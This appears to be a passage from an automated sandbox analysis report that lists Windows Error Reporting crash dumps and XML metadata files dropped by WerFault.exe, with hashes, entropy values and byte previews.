Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="538521" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER50A2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 11 08:17:55 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	188463
Entropy (8bit):	4.146973430348555
Encrypted:	false
SSDEEP:	1536:kF/umbV+FLTgbNAx6j+NRtTYjCDyZA2M/C6Jo4RuBojRoQvTpN4uE2aOzSVXvhoJ:kFmmJ+FLTgXyZBySoQ4uEqzyfaSocs8
MD5:	56D45653F89B5956121BEF0A870D1141
SHA1:	DCF44E3F02BA85833EFD27AED6886A785DFD1D1F
SHA-256:	8A917AB2F50B3B1EE1C31B46E58045C206A369A258E72CC9D4E3DE674812FB48
SHA-512:	AEF622AEFA42589CB8138A86A73D2E2FB35F30C34044AB418982AB7FB8CF4D37B437F937DCDAF6BA60942853CC5759165BC0AFF736DAC587FB11B1086644D5A7
Malicious:	false
Preview:	MDMP..a..... .......3..g........................x...........$............ ...9..........`.......8...........T............%..............4........... ...............................................................................eJ..............GenuineIntel............T...........2..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51DC.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8398
Entropy (8bit):	3.692489841617831
Encrypted:	false
SSDEEP:	192:R6l7wVeJ55i6u6Y2DcSU5pkIgmfZTkpr089ba7sfzHv+m:R6lXJXi6u6YxSU5pDgmftgaAfL
MD5:	CD36AF09847605C3766060E674CEFAE7
SHA1:	682CF9BF17F3C199B34AB9A58534BE1843D27B01
SHA-256:	0BF3EB7F453803657B44A570BAF9C215F8E43D456C7ACC9F12EBB18E5B947A8F
SHA-512:	26653CC39BD999B83F153E987F21B074F1BE92A6A72F9BB9AC98C762A32EA3E4249510AF255FDC127332A187E45DC1881E4E34E93AB62EFCF8EBBF7C1C3E2069
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51FC.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4756
Entropy (8bit):	4.467140495582274
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI983WpW8VYTYm8M4J6IEO7FEj+q8vuEO/d/l9iCd:uIjfNI7SG7VHJ6x/jKLuVlsCd
MD5:	9196DED8B7DCBACBAF32CC9CA5E89B8D
SHA1:	DD59F854E52A91C599AA44594B3362832B22E304
SHA-256:	A0668BD7D44F723DFB7DE5721012D6EF28A3B1507EB8DC5B6D6C61C885238E82
SHA-512:	E0ACA6FAC12C08F13AB2DC1ED21BC170FD165C1FC827AFD003A7F901A13690CF2F7F5402FB931F88576B99ED8496E9CC7D255E94D74030D456D711788507151E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="538520" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER56A8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 11 08:19:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	188611
Entropy (8bit):	4.113794576737089
Encrypted:	false
SSDEEP:	1536:MUVZplkLTgrUAJcA2wEC57tTHP9CDZZbVB7CmM/Cf5RuBojR7QCpN4uE2aOdO9Vg:MEL2LTgXcA2RCTboZDB7f7/4uEqMy8
MD5:	6CC0E790B121917BD993A6F1C5E2983F
SHA1:	297FAA12BD16278F8FABE3A1AC3A5C1D350BAD65
SHA-256:	C5671185ED8229481C4A6D5E6ABAF9CB76C4D0AA2F783761BCC7A042A04E7BFB
SHA-512:	BDA6B9D08E99535A5F81EB019CD144C45587E5A6FF76D43D627AEFCE5FBC09B37AEC8979574057861C4CC54E337E3737245609BA2E03FAE8ECD09D86EFE2D1DF
Malicious:	false
Preview:	MDMP..a..... .......v..g........................x...........$............ ...9..........`.......8...........T............%..3...........4........... ...............................................................................eJ..............GenuineIntel............T.......p...u..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5755.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8400
Entropy (8bit):	3.687674234613048
Encrypted:	false
SSDEEP:	192:R6l7wVeJQ5s6/6Y2DqSUJNFgmfZTkprm89bVmsfDP7Hm:R6lXJEs6/6YHSUJNFgmftuVFfry
MD5:	DF5932479856CDE2803B2A4F7599799F
SHA1:	A4F2B2EA38CC283149885F0A637173021B6AA195
SHA-256:	F0E4EA7352A3FD28C7FCEE7D2FEF0075E8825575D8D538F999A65408488C3BFE
SHA-512:	CE88B72C5E69F9B906523E1E1BD577B646B02DAAEE246F2DC3F9F154DF34EBAD83A02ABC6548BB164C6C374739B0BF77707E7BCC7EA6CFECBCDE69E9E2FC171B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5785.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4756
Entropy (8bit):	4.468086960555129
Encrypted:	false
SSDEEP:	48:cvIwWl8zsEJg77aI983WpW8VYrYm8M4J6IEO7Fjh0+q8vuEOId/l9iWd:uIjfCI7SG7VPJ6xwuKLJVlsWd
MD5:	A0A00C07FA201AC3BE11723583C18DAB
SHA1:	66AFA6CD89AA2C38FE25896D16C624B3D8982153
SHA-256:	838AE8E87A9027AF76428DAFA8D8E518B3F0981742331DAB212DD9F2CB50E7D8
SHA-512:	9AD41E643EE376A4D6C035E15DB99E34D0A333167CCDC162BF3173CC62CC449A66209EEAB9E5FF7E65F5B2F3F94C89394D8B6968BEAFF11687F3064BCEB5AA94
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="538521" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7001.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 11 08:18:03 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	188159
Entropy (8bit):	4.122560418846781
Encrypted:	false
SSDEEP:	3072:nzQlLTgPjqaKNy2koW3Ce7yS4uEqGypF:n4TgrqaUkooF7v4Ly
MD5:	A30F1207E9E41DEADB3540FCE5C4458C
SHA1:	68CEEA028AF3E9717784E2AF1404DF0F96980A55
SHA-256:	6447D4DD6058AE6B49C223945B285180E0A6F943FE1157DE0D41C034B3E0E65C
SHA-512:	9A94B74BE1B29C364D5849943EC1ACE03093923C998F758ED95A4E1D802884DE0140B64FC1AEC9E44CD634F4D72444DFCFD7AC784AC49811DF95C198C3FB83B2
Malicious:	false
Preview:	MDMP..a..... .......;..g........................x...........$............ ...9..........`.......8...........T............%..o...........4........... ...............................................................................eJ..............GenuineIntel............T...........;..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70BE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8398
Entropy (8bit):	3.688710803065136
Encrypted:	false
SSDEEP:	192:R6l7wVeJ0H6A6cx6Y2DJSU9cp9gmfZTkprT89btusfvcPm:R6lXJu6cx6YESU9cp9gmftFttfvp
MD5:	3C48992CDBFAA6F4075D659D2477C420
SHA1:	C00B0709B1EFF3414D2CF125F58A251BB18060E0
SHA-256:	D756BF56390729141A25D5A5C2DFBBFF28E09D2D26C5B943B6BD1C6B29F13393
SHA-512:	D2769278784958F69EE1AE4240DCB47925FBB30734F3B2309F868E41BDB963074627914DFFE8FA104935AD9370D06D9E3C7751C59753DAFC9EC80CDB536A2CB3
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70EE.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4756
Entropy (8bit):	4.467984420193577
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI983WpW8VYAYm8M4J6IEO7FK4nU+q8vuEOEd/l9iqd:uIjfNI7SG7VQJ6xj4nUKLpVlsqd
MD5:	B9FFA020724F22836FCC3CB4318DBE2F
SHA1:	863D230C12423538DB498E127B1A1AF8FC2E5261
SHA-256:	90FF71AB95D6B8662470145A5420D34A50EF7E6CDD4999B3E5310D4DC749F5A8
SHA-512:	D4CBC33B510DD0BEE8EAD4E3CA1C2D03049B49BDD14B409FF952119255D2CE06C20CBE6537896AFAD2A0B4262E34C4E9F2F2F8631BB517498EDC7D15850DD9D5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="538520" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA90E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 11 08:19:24 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	184407
Entropy (8bit):	4.2030052220399305
Encrypted:	false
SSDEEP:	3072:gZLTg3EWeERgsJy/RICq2NQ614uEqxyXB/IO:glTg5HRgRICPQa4wyR/
MD5:	237EDDD29C5BDE19D3EC340D727425C6
SHA1:	D845BFBE4F10BDE8946BCEF0193899F2E1D284E6
SHA-256:	534D0AE03D15CDEB152D99B38C220F7A8BF26006899DBA1F2F826139187A80BF
SHA-512:	623F8A88E36AEBF34251282B23C30C7BBB5B5D16C7E71981DAB1A93835FDE6540AC3F0B6F4F1E60ADF4BB648EDCC874D82E121098C939E64DD4BF425EB6B1D78
Malicious:	false
Preview:	MDMP..a..... ..........g........................x...........$...........t ...9..........`.......8...........T............%.............4........... ...............................................................................eJ..............GenuineIntel............T..............g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA09.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8398
Entropy (8bit):	3.689794255081346
Encrypted:	false
SSDEEP:	192:R6l7wVeJzp6p6Y2DqSUiNRd/gmfZTkprO89bB0sfgLm:R6lXJ96p6YXSUiNRd/gmftGBnfx
MD5:	AD5A9D7DA4FE1C52B6AEEE60C0CBBA1C
SHA1:	624669D4A052BBAADDE886E8AC2C6D944FCB7050
SHA-256:	DF9449462756491AF418BF08C282BCBF9448C778B21F7FC48CAF9AC5E46B5893
SHA-512:	37215538FB85BB02901519E397CA948C5196F4C75689088C39483DFF2A0B61CE861EB0C68E68F36658EB0B760FCE8D27B51650FA0FEFDD25590EF5F7D572F182
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA48.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4756
Entropy (8bit):	4.467548809846957
Encrypted:	false
SSDEEP:	48:cvIwWl8zsVJg77aI983WpW8VYyYm8M4J6IEO7Fkd7+q8vuEO75d/l9ifd:uIjfvI7SG7VWJ6xrd7KLy5Vlsfd
MD5:	B8E6D966AD6039161BA5782DE706D33B
SHA1:	6BE12BB3DA708AB5F6A784ED5D6F6C43FC258CB0
SHA-256:	681623CFD2467DBF13B2894CDB255CDB1218E7B6519409CE2277514BA82BB067
SHA-512:	6074C236E071D3BF8963ADE0A8161B9FABD89F1A01C1F18ECAA81F1886D2A51E9127F7087179853E1D266A6394EE31B7775070B1BEB2D49C9A7D0AF8119C8CF2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="538522" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC536.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 11 08:18:25 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	187631
Entropy (8bit):	4.134801584679358
Encrypted:	false
SSDEEP:	3072:qFJLLTgZo1iGZJhAbNuCGF17b4uEqWyXr:q/PTgZo1rQuZ37b43yX
MD5:	6340525B10240BD15ED75FF6630F6FBB
SHA1:	64B10EDD8FF7804E6AA34F150AAF2D36C3F188B9
SHA-256:	E7C5F0653AEDB24E364986D1D9D38D365860D59C21B4983A67E0D61325ABB88E
SHA-512:	F50B64DEA006BAC4C27E5EB6464666598640D9A21C841BF6D7864D0999D2B1941C1B05861E292011572169E278AA9773160A70ED7053C69C2FF36A4C6A2D4DA3
Malicious:	false
Preview:	MDMP..a..... .......Q..g........................x...........$............ ...9..........`.......8...........T............%.._...........4........... ...............................................................................eJ..............GenuineIntel............T...........P..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC660.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8400
Entropy (8bit):	3.688613788332007
Encrypted:	false
SSDEEP:	192:R6l7wVeJp+6P6Y2D5SU9g+4gmfZTkprr89bZcsf7Tm:R6lXJg6P6YUSU9g+4gmft9Zvfe
MD5:	681AA1DF0EA0438883DB19D37A409E50
SHA1:	404261A1DD553C2917E278240A2EBE5F9AA10AB7
SHA-256:	8FAACA4AE1D69928D98988D6A11C60B586C092E659BED90D0430E039123DEE39
SHA-512:	0D26C90532747A1B7A2DB99D31E3E79E5608092EAFE8621BBA76E8ED9CD49F23A764824CE75E9C9B7B7F71C92831872ADF9DE2AD635361F27F445BA7A4179A87
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC690.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4756
Entropy (8bit):	4.468460263979584
Encrypted:	false
SSDEEP:	48:cvIwWl8zsEJg77aI983WpW8VYi5Ym8M4J6IEO7FVB+q8vuEO1id/l9iFd:uIjfCI7SG7VWJ6xOBKLZVlsFd
MD5:	49EA69D8BE643D173713B74C6C33BD1F
SHA1:	B1DAC0C2DB56020DE98B7F73CD911380BB60F23E
SHA-256:	00B686E53E9B8A600C6EB5ECAFAE7913F7B62AC8912FF89C27A37F163ADC202B
SHA-512:	C7D81E506BC83A0996BAB0F05FD5B0D5A6B019AAAEE38E0FAA9CDCC7B83E7752B7DB23B0007BFCF7F112293BA425A1E4D3DA3C6288C087A10A95464632CD6CA8
Malicious:	false
